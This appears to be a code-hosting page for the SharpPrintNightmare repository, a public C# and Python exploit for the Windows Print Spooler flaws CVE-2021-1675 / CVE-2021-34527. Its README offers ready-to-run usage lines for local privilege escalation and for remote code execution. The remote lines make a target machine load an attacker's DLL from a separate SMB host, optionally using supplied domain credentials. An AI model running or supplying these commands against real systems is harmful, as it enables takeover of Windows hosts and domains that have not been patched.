You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
CVE-2021-1675/SharpPrintNightmare
cube0x0 18fde4bfec C# Dynamic pDriverPath support 3 years ago
..
SharpPrintNightmare C# Dynamic pDriverPath support 3 years ago
CVE-2021-1675.py New python version with MS-PAR 3 years ago
README.md C# Dynamic pDriverPath support 3 years ago

README.md

C# Implementation of CVE-2021-1675 / CVE-2021-34527

Update

New CVE-2021-1675.py has been uploaded which will get the same result as the C# version

No longer need to manually specify pConfigFile with C# version

Usage

The RCE functionality might need to be executed with local administrator privileges on YOUR machine.

#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123

Acknowledgements

For contributing new ideas or exploit improvements, thanks to